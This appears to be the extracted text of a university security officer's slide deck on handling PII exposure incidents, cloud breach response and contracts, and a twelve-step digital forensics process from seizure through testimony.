Is this a breach or an incident?

Regardless we need to mitigate the situation


8484

Access Control Incident-ResponseAccess Control Incident-ResponseDiscovery• Reported by University staff• Root cause was analyzed• Used Spider to scan affected volumes for PIIShort-term mitigation• Inheritance and permissions were fixed.• Access dates for all files on affected volumes were analyzed to determine scope of risk• All affected PII were identified.Notification • Met with General Counsel, CIO, • contacted Oregon Division of Finance and Corporate Securities• Determined this was not a breach (by risk of harm analysis)• Sent email to users with PII Long-term Mitigation• Legacy PII discovery effort• Provide secure enterprise storage for future PII. • Establish enterprise PKI for encryption infrastructure• Publish procedures requiring the use of encryption. Awareness • Presentations to HR admins, Executives admins, staff• Presentations to technical admin about plans and timetables


8585

Website in the Cloud De-facedWebsite in the Cloud De-faced

A website of yours that is hosted in a cloud is defaced. Parts of this website can access sensitive data that is also stored in the Cloud.


8686


In January 2010, shortly after President Obama finished his State of the Union address, the webpages of 49 Congressional members were defaced. All of the webpages were managed by GovTrends. GovTrends ironically had the phrase “You get what you pay for” on their website.

In August 2009, 18 Congressional member websites, also managed by GovTrends, were defaced.


8787


Following the August attack, Representative B sent a letter to the CAO (Chief Administrative Officer) of the House, asking for actual details of the attack and a plan for notification of these incidents in the future.

Rep. B’s office contacted GovTrends and requested copies of the appropriate logs. GovTrends redirected him to HRIS. HRIS claimed they do not investigate or prosecute since there is no way to track down the criminals responsible for this act.


8888


At a Cloud Law Summit Microsoft's head of legal, Dervish Tayyip, said the company would not provide financial guarantees against data-protection issues on cloud contracts.

"We're not an insurance company. What is important is that customers understand the [cloud] offerings are standardised — they are what they are. If the offering does not meet customer needs, maybe the cloud is not a realistic offering."

Cloud providers shrug off liability for securityBy Tom Espiner, ZDNet UK, 12 February, 2010 13:30

http://www.zdnet.co.uk/2010/02/12/


8989

Cloud Incident ResponseCloud Incident Response

Discovery• Prevented by Vendor refusal to cooperateShort-term mitigation• Undetermined - experts claim vendors explanation makes no senseNotification • Can’t determine risk of harm.Long-term Mitigation• Nothing in the press about it.Awareness • Articles on the web


9090

Breach Response for CloudsBreach Response for Clouds

Unlike in-house repositories of information, you cannot assume that you have the right and the authorization to investigate breaches in Clouds

You must ensure that your contract with the Cloud vendor permits you this capability.

If regulation requires that you protect your data from the Cloud provider then you must encrypt it and ensure that the contract does not contain a provision which would permit the vendor from investigating your content.

If the data that you store in the cloud includes FERPA protected data, then the cloud provider must agree to act as a FERPA agent for the university and to protect it as such.

Your contract should bind the cloud vendor to meet any regulatory and legal requirements that you are required to meet.

Be aware that Law Enforcement may approach your Cloud vendor and demand access to your data even if you have legal reservations about the legality of their request.

Surrendering your data to a third party weakens your position that the data is valuable unless you have taken measures to affirm it’s value despite the transfer. These measures might include encrypting the data or contractually binding the cloud vendor to protect the data in accordance with its value or sensitivity.

Your contract should explicitly grant your security and administrators the rights that you require regarding monitoring and investigations.

For any Cloud user interface, the user should be informed that they should have no expectation of privacy except that required by explicit law or regulation. They should have the user agree that use of the Cloud constitutes consent to monitoring. This would need to be spelled out contractually with your Cloud vendor.


9191

Breach Prevention for CloudsBreach Prevention for Clouds

You can avoid a breach in the cloud by requiring all data in the cloud to be encrypted.

You encrypt the data before storing itYou contract the Cloud provider to encrypt your data

Full Cloud encryptionIndividually accountable encryption with a corporate escrow

Must gather assurances that the Cloud hosts have sufficient security (SAAP)SAS-70

Must gather assurances that the Cloud application has sufficient security (SAAI)Systrust or SAS-70

Must gather assurances that the Cloud based web application has sufficient security (SAAS)Webtrust, SAS-70, vulnerability assessments or penetration


9292

Example Incident/Breach Response PlanExample Incident/Breach Response Plan

Review the exposed material and determine the scope and nature of the incident.Number of unique disclosures or opportunities for disclosureTo the best of our ability determine if there is any evidence that the exposed information was accessed.Take actions to limit or eliminate the exposure

Arrange a meeting with General Counsel, CIO, and the list owner. Describe the incident, disclosures and the data found during the review. Determine whether the disclosure (or potential disclosure) meets the criteria in the FERPA, GLBA, FISMA, HIPAA, PCI standards, state law or regulation such as the Oregon ID Theft Protection Act.

If yes, If no clear evidence of disclosure, determine potential risk of harm

Draft and send a response to the individual that identified the disclosureDraft a response to the individuals whose personally identifying information was exposed.Determine the cause of the exposure. Determine permanent solution and implement.


9393

Next Steps?Next Steps?

Acquire PII Search Tools

Design Solutions for PII Challenges

Search for legacy PII

Create strategy for searching PII at

home

Create Awareness campaign for PII

removal

Establish a PII Incident Response

team

Determine Breach thresholds and Risk of Harm

criteria

Develop PII template reponse letters to reporting

individual

Secure known legacy PII

Create PII Awareness campaign

Monitor for new PIIDesign Monitoring

strategy

Gather info about pockets of legacy

PII

Create Awareness campaign for PII removal at home

Develop staff communications for departmental

involvementDevelop PII

template reponse letters to the

harmed individuals

Develop Reporting and record

keeping process

Sustaining operations


9494

Design solutions for PII Design solutions for PII challengeschallenges

• Whole disk encryption (pgpdisk)• Enterprise supported file encryption (a PKI solution)• Secure file server (Truecrypt)• Personal file encryption (Winzip ) • Require network storage• Segregate workstations that work with PII • No use of home computers.• Convert home computer to secure dumb workstation• Provide secure laptops for remote use• No dual use workstations for sensitive data• Search all servers, data bases, workstations for PII• Create strategy to let users search for PII on existing home systems.• Data Loss Prevention systems (Discovery, Prevention of loss, Protection of the data, Monitoring of PII use)


95

Remaining IssuesRemaining Issues

95

How do different states' breach notification laws apply to Educause member institutions?

What is the threshold for victim notification? AG notification?

Is a breach insurance policy a good strategy?

Should Educause/CIOs pursue agreements for credit monitoring, post-breach forensics, or other services?

Should Encryption be required?


96

QuestionsQuestions

Questions or Discussions

Craig A Schiller, CISSP-ISSMP, ISSAPChief Information Security Officer

Portland State University503.725.9107


97

Step1: Accusation or Incident Alert Step1: Accusation or Incident Alert

Taking Notice of Suspicious Incidents

Circumstances that get the process started

Self-initiated incidents: “look for circumstances”

Directed incidents – respond to calls or alerts

What effect will this have on the evidence should this turn out to be “something”?


98

Step 2: AssessmentStep 2: AssessmentHas a incident, breach, or crime occurred?Triage – limited resources Look for elements of a specific crime

Physical or serious financial injury?Can problem be contained/eliminated

quickly?Extenuating circumstances?Notification required or desired?

Continue investigation or stop here?


99

Step 3a: Incident/Crime Scene Step 3a: Incident/Crime Scene Protocols Protocols

Secure the SceneElectronic evidence is fragile and easily

changedKeep scene from changing on purpose or

accidentallyTechnical Working Group for Electronic Crime

Scene Investigation Guide for First Responders: www.ncjrs.org/pdffiles1/nij/187736.pdf

http://www.ncjrs.org/pdffiles1/nij/187736.pdf


100

Step 3b: Incident/Crime Scene Step 3b: Incident/Crime Scene ProtocolsProtocols

Document the Scene

Retain and document the state of the scene – need a standard, documented protocol


101

Step 4 - Identification or Seizure Step 4 - Identification or Seizure

Electronic EvidenceRecognition and identification of the

evidence.Documentation of the crime scene.Collection and preservation of the evidence.Packaging and transportation of the evidence.


102

Ways in Which Electronic Devices May be EvidenceWays in Which Electronic Devices May be Evidence

"We see criminals use computers in one of three ways: First, computers are sometimes targeted for theft or destruction of their stored data… Second, computers are used as tools to facilitate traditional offenses… Third, computers are used to store evidence."

Janet Reno, U.S. Attorney General, Oct 28, 1996


103

Recognizing Electronic Evidence – User Created FilesRecognizing Electronic Evidence – User Created Files

Address booksE-mail filesAudio/video filesImage/graphics filesCalendars

Internet bookmarks or favorites

Database filesSpreadsheet filesDocuments or text

files


104

Recognizing Electronic Evidence – Recognizing Electronic Evidence – Computer Created FilesComputer Created Files

Backup filesLog filesConfiguration filesPrinter spool filesCookies

Swap filesHidden filesSystem filesHistory filesTemporary files


105

Recognizing Electronic Evidence – Recognizing Electronic Evidence – Other Evidentiary ArtifactsOther Evidentiary Artifacts

Bad clustersComputer date, time,

and passwordDeleted filesFree spaceHidden partitionsLost clustersMetadata

Other partitionsReserved areasSlack spaceSoftware registration

informationSystem areasUnallocated space


106

Recognizing Electronic Evidence – Recognizing Electronic Evidence – PDAs, E-Organizers, Mobile PhonesPDAs, E-Organizers, Mobile Phones

Address bookCalendarsAppointment infoDocumentsE-mailHandwriting

PasswordsPhone bookText messagesVoice messages


107

Recognizing Electronic Evidence – Recognizing Electronic Evidence – Printers, Scanners, FAXes and CopiersPrinters, Scanners, FAXes and Copiers

“tool marks”BuffersNetwork IdsUsage logProof of capability


108

Recognizing Electronic Evidence – Recognizing Electronic Evidence – ComponentsComponents

Network cardsMAC address

CPUCPU serial number on

newer Intel chips

Cables and connectorsMissing device?


109

Recognizing Electronic Evidence – Recognizing Electronic Evidence – Other Devices to be Concerned WithOther Devices to be Concerned With

Smart CardsDonglesAnswering Mach.

Caller ID infoDeleted MessagesLast number calledPhone numbers &

namesTapes

Digital CamerasImagesRemovable cartridgesSoundTime and date stampVideo

Memory Cards


110

Search for EvidenceSearch for Evidence

Locard's Principle of Exchange - when any two objects come into contact, there is always transference of material from each object onto the other

What are you adding to the scene?


111

More Seizure and IdentificationMore Seizure and Identification

Can’t seize everything – make informed, reasoned decisions

about what to seize – normally guided by search warrant

Document everything

Chain of custodyAuthenticityLater identification


112

Seizure - 1Seizure - 1

Identify and remove all persons from the area – document their location at the time of entry – do not let anyone touch anything!

Interview (if possible) owners/users of electronic devices – try to get

passwords and user namesdocumentationnetwork topographyencryption keyslocation of offsite storage


113


Formulate a systematic search plan Document physical scene (power status,

location of mouse, keyboard, monitor, etc.) – look for stickies!

Photograph scene to create visual recordPhotograph monitor screen – may require

videotapingNote peripherals and devices can contain

latent prints – wear gloves!


114


Do not alter the condition of an electronic device – if it is off, leave it off!

Identify cables (phone lines, network lines, printers, etc.) - document, label and disconnect each cable from the wall if possible

You need to make a decision about volatile data (RAM, cache, etc.)


115


Transport hardware to evidence storage facility – or alternatively, do forensic analysis on site

Keep computer components away from magnetic items – radio modem in the back of a patrol car

Remember batteries can fail – make sure new ones are inserted as soon as practical


116

Step 5: PreservationStep 5: Preservation

Create an exact duplicate of electronic storage devices and keep the original safely stored

Will have to provide copy of all exhibits to defense for examination

Work on duplicate in case your examination damages the contents

What does it mean to have an “exact duplicate”?


117

Step 6: RecoveryStep 6: Recovery

Extract deleted and encrypted filesRecover all unavailable data whether or

not it is related to the case – usually not done manually

Especially note what has been deleted and when


118

Step 7: HarvestingStep 7: Harvesting

Organize the contents of the storage deviceGather metadataCatalog what you haveApplications, data, images, documents, etc.


119

Step 8: ReductionStep 8: ReductionSeparate good from bad - Eliminate objects

that are not related to the investigationCommercial clipart, standard operating system

DLLs, computer games, etc.

Smallest set of digital information with highest value for proving allegations

Beware of deleting exculpatory data!NIST National Software Reference Library

www.itl.nist.gov/div897/docs/nsrl.html

http://www.itl.nist.gov/div897/docs/nsrl.html


120

Step 9: Organization and Search Step 9: Organization and Search

Physically organize the reduced setMake sure every file is indexed so it can be

found on the original hard driveInverted links are helpful


121

Step 10: AnalysisStep 10: Analysis

Review file contents within the context of the assertions to be proven

Try to refute the assertions as well – look for exculpatory evidence

Validate your findings


122

Step 11: ReportingStep 11: Reporting

A detailed record of:what you foundhow you found itwhere it can be found on the original disksignificance of what you found


123

Step 12: Persuasion & TestifyingStep 12: Persuasion & Testifying

Present your findings to the triers-of-factConvey technical issues to laypeople in a

clear manner